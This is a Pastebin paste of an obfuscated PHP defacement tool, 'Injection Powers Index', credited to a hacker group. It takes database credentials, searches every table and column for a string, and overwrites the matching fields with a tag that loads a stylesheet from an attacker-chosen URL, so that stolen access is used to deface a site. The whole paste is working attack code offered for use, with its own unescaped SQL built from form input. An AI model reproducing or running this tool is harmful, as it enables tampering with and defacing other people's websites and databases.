Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- echo '<html>
- <head>
- <title> Injection Powers Index </title>
- <style type="text/css">
- html,body {
- margin: 0;
- padding: 0;
- outline: 0;
- }
- body {
- direction: ltr;
- background-color:#000000;
- color: rgb(153, 153, 153);
- text-align: center
- }
- input {
- font-weight: bold;
- color: #FFFFFF;
- dashed #ffffff;
- border: 1px dotted #555555;
- background-color: black;
- padding: 2px
- }
- input:focus{
- box-shadow:0px 0px 3px #DDDDDD;
- border: 0px dotted #DDDDDD;
- }
- input:hover{
- box-shadow:0px 0px 3px #DDDDDD;
- }
- .hedr
- {
- font-family: Courier New,Tahoma ;
- font-size: 26px;
- text-shadow: 0px 0px 3px red ;
- }
- .all
- {
- margin-left: auto;
- margin-right: auto;
- width: 40%;
- padding: 5px;
- -moz-box-shadow: inset 0 0 20px #222222;
- -webkit-box-shadow: inset 0 0 20px #222222;
- box-shadow: inset 0 0 20px #222222;
- }
- .all2
- {
- margin-left: auto;
- margin-right: auto;
- width: 40%;
- padding: 5px;
- -moz-box-shadow: inset 0 0 20px #222222;
- -webkit-box-shadow: inset 0 0 20px #222222;
- box-shadow: inset 0 0 20px #222222;
- }
- .tab{
- font-size: 18px;
- font-family:Tahoma, Arial, sans-serif;
- color: #BBBBBB;
- text-shadow: #FF0000;
- }
- .tab tr{
- padding: 5px;
- box-shadow:0px 0px 1px #333333;
- }
- .tab tr td{
- padding: 5px;
- }
- .inj{
- font-family: Tahoma;
- font-size: 18px;
- color: #336600;
- }
- .inj2{
- font-family: Tahoma;
- font-size: 18px;
- color: red;
- }
- .fot{
- font-family:Tahoma;
- color:#333333;
- font-size: 9pt;
- text-shadow: 0px 0px 2px #222222;
- }
- </style>
- </head>
- <body>
- <br /><br />
- <div class="hedr"> Injection Powers Index </div> <br />
- ';
- function search($IIIIIIIIIIIl){
- $IIIIIIIIIII1 = mysql_query("SHOW TABLE STATUS");
- $IIIIIIIIIIll = array();
- while($table = mysql_fetch_array($IIIIIIIIIII1)){
- $IIIIIIIIII1l = "SELECT * FROM $table[Name]";
- $IIIIIIIIII11 = mysql_query($IIIIIIIIII1l);
- $IIIIIIIIIlII = @mysql_fetch_assoc($IIIIIIIIII11);
- if(!$IIIIIIIIIlII){
- continue;
- }
- $IIIIIIIIIlI1 = array_keys($IIIIIIIIIlII);
- $IIIIIIIIIIll[$table['Name']] = $IIIIIIIIIlI1;
- }
- $IIIIIIIIIlll = array();
- foreach($IIIIIIIIIIll as $table=>$IIIIIIIIIlI1){
- $IIIIIIIIII1l = "SELECT * FROM `$table` WHERE ";
- foreach($IIIIIIIIIlI1 as $IIIIIIIIIll1=>$column){
- if($IIIIIIIIIll1 == 0){
- $IIIIIIIIII1l .= "`$column` LIKE '%$IIIIIIIIIIIl%'";
- }else{
- $IIIIIIIIII1l .= " OR `$column` LIKE '%$IIIIIIIIIIIl%'";
- }
- }
- $IIIIIIIIII1l = mysql_query($IIIIIIIIII1l);
- $IIIIIIIIII11 = mysql_num_rows($IIIIIIIIII1l);
- if($IIIIIIIIII11 >0){
- $IIIIIIIIIlll[] = $table;
- }
- }
- $IIIIIIIIIl1l = array();
- foreach($IIIIIIIIIlll as $table){
- $IIIIIIIIIlI1 = $IIIIIIIIIIll[$table];
- foreach($IIIIIIIIIlI1 as $column){
- $IIIIIIIIII1l = "SELECT * FROM `$table` WHERE `$column` LIKE '%$IIIIIIIIIIIl%'";
- $IIIIIIIIII1l = mysql_query($IIIIIIIIII1l);
- $IIIIIIIIII11 = mysql_num_rows($IIIIIIIIII1l);
- if($IIIIIIIIII11 >0){
- $IIIIIIIIIl1l[] = array('table'=>$table,'column'=>$column);
- }
- }
- }
- return $IIIIIIIIIl1l;
- }
- $hostname = $_POST['hostname'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $database = $_POST['database'];
- $index = $_POST['index'];
- $search = $_POST['search'];
- if(!isset($_GET['step'])){
- echo '<div class="all"><br /><br /><pre><form method="POST" action="?step=1">
- Hostname : <input type="text" name="hostname">
- Username : <input type="text" name="username">
- Password : <input type="text" name="password">
- Database : <input type="text" name="database">
- Css Url : <input type="text" name="index">
- <input type="submit" value="start" >
- </form></pre><br /><br /></div>
- <br /><div class="fot"> ||
- Idea :: Mr.Alsa3ek ||
- Programming :: G-B ||
- <td>Designer :: Al-Swisre ||
- <br /><br />
- Muslims Hackers</div>';
- }
- elseif($_GET['step'] == 1){
- $IIIIIIIII1l1 = @mysql_connect($hostname,$username,$password) or die('Database Information Incorrect');
- @mysql_select_db($database,$IIIIIIIII1l1) or die('Database Name Incorrect');
- echo '<div class="all"><form method="POST">
- <br /><br /><input name="search" type="text">
- <input type="submit" value="Search">
- <input type="hidden" name="username" value="'.$username.'">
- <input type="hidden" name="password" value="'.$password.'">
- <input type="hidden" name="database" value="'.$database.'">
- <input type="hidden" name="hostname" value="'.$hostname.'">
- <input type="hidden" name="index" value="'.$index.'">
- </form>';
- if(isset($_POST['search'])){
- $IIIIIIIIII11 = search($search);
- if(count($IIIIIIIIII11) == 0){
- echo 'No Result.';
- exit();
- }
- foreach($IIIIIIIIII11 as $IIIIIIIII111){
- $table = $IIIIIIIII111['table'];
- $column = $IIIIIIIII111['column'];
- echo '<form method="POST" action="?step=2">
- <input type="hidden" name="username" value="'.$username.'">
- <input type="hidden" name="password" value="'.$password.'">
- <input type="hidden" name="database" value="'.$database.'">
- <input type="hidden" name="hostname" value="'.$hostname.'">
- <input type="hidden" name="search" value="'.$search.'">
- <input type="hidden" name="index" value="'.$index.'">
- <input type="hidden" name="table" value="'.$table.'">
- <input type="hidden" name="column" value="'.$column.'">
- <br />
- <table width="40%" align="center" class="tab">
- <tr>
- <td> Table </td>
- <td>'.$table.'</td>
- </tr>
- </table>
- <br />
- <table width="40%" align="center" class="tab">
- <tr>
- <td>Column</td>
- <td>'.$column.'</td>
- </tr>
- </table>
- <table width="40%" align="center">
- <tr>
- <td colspan="2" align="center"><input type="submit" value="Inject" class="pd"></td>
- </tr>
- </form>
- <br /><tr></table>';
- }
- }
- }elseif($_GET['step'] == 2){
- $table = $_POST['table'];
- $column = $_POST['column'];
- $IIIIIIIII1l1 = mysql_connect($hostname,$username,$password) or die('Database Information Incorrect');
- mysql_select_db($database,$IIIIIIIII1l1) or die('Database Name Incorrect');
- $IIIIIIIIIIll ="<head><link href=$index type=text/css rel=stylesheet></head>";
- $IIIIIIIIIIll = addslashes($IIIIIIIIIIll);
- $IIIIIIIIII1l = mysql_query("UPDATE ".$table." SET ".$column." ='$IIIIIIIIIIll' WHERE `$column` LIKE '%$search%'") or die(mysql_error());
- if($IIIIIIIIII1l){
- echo '<div class="inj"><br /><br /> The update process is completed </div>';
- }else{
- echo '<div class="inj2"><br /><br /> The update process is not completed </div>';
- }
- }
- ;echo '<br /><br />
- </body>
- </html>';;–àK
- ?>
Add Comment
Please, Sign In to add comment